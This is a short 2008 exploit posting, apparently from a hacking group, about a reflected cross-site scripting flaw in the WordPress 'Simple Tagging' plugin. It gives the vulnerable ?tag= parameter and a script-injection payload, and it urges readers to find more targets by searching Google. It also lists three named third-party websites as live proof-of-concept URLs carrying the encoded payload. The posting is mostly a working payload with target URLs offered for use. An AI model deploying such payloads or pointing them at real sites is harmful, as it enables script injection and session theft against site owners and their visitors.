WordPress Simple Tagging Plugin Cross Site Scripting Vulnerability (XSS)

Submitted by kernel_panic on Fri, 09/05/2008 - 16:34

[ WordPress Simple Tagging Widget Cross Site Scripting Vulnerability (XSS) ]

[x] Script | www.herewithme.fr/wordpress-plugins

[x] Author | kernel_panic
[x] Site | codebomb.org
[x] Date | 5 Sept 2008

[+] D0rk | Try to find your own using Google. The vulnerable sites
are: www.site.com/?tag=[XSS] or www.site.com/folder/?tag=[XSS]

[+] 3xpl0it | http://site.com/?tag=[XSS]
e.g.: [XSS]: <script>alert(/XSS/)</script> or try to use others
in order to work

p0c :

www.wiggler.gr/?tag=%3Cscript%3Ealert(/XSS/)%3C/script%3E
dialogos.pasok.gr/?tag=%3Cscript%3Ealert(/XSS/)%3C/script%3E
www.programacionweb.net/buscador/?tag=
%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

[x] Greetz | To All Code Bombers!